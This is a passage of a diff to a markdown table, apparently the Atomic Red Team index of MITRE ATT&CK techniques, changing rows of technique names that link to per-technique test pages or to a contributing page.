TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [External Remote Services](../../T1133/T1133.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Environmental Keying [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | | -| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Local Accounts](../../T1078.003/T1078.003.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | | -| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | | -| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | | -| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hide Artifacts](../../T1564/T1564.md) | | | | | | | | -| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Office Application Startup](../../T1137/T1137.md) | [Port 
Monitors](../../T1547.010/T1547.010.md) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | | -| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | -| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | -| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | -| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | -| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Path 
Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Rc.common](../../T1037.004/T1037.004.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | | -| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | | -| | | [Port Monitors](../../T1547.010/T1547.010.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | -| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | -| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | -| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | -| | | [Rc.common](../../T1037.004/T1037.004.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Services Registry 
Permissions Weakness](../../T1574.011/T1574.011.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | | -| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | | -| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Systemd Service](../../T1543.002/T1543.002.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | | -| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | | -| | | [Screensaver](../../T1546.002/T1546.002.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Providers [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | | -| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Trap](../../T1546.005/T1546.005.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | -| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | | -| | | [Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | | -| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | | -| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | | -| | | [Systemd Timers](../../T1053.006/T1053.006.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear 
Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and 
Directory Discovery](../../T1083/T1083.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | +| | [Native API](../../T1106/T1106.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Network 
Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [PowerShell](../../T1059.001/T1059.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | +| | [Python](../../T1059.006/T1059.006.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | 
[Scheduled Task](../../T1053.005/T1053.005.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Query Registry](../../T1012/T1012.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | +| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | [Service Execution](../../T1569.002/T1569.002.md) | [Cron](../../T1053.003/T1053.003.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | +| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | 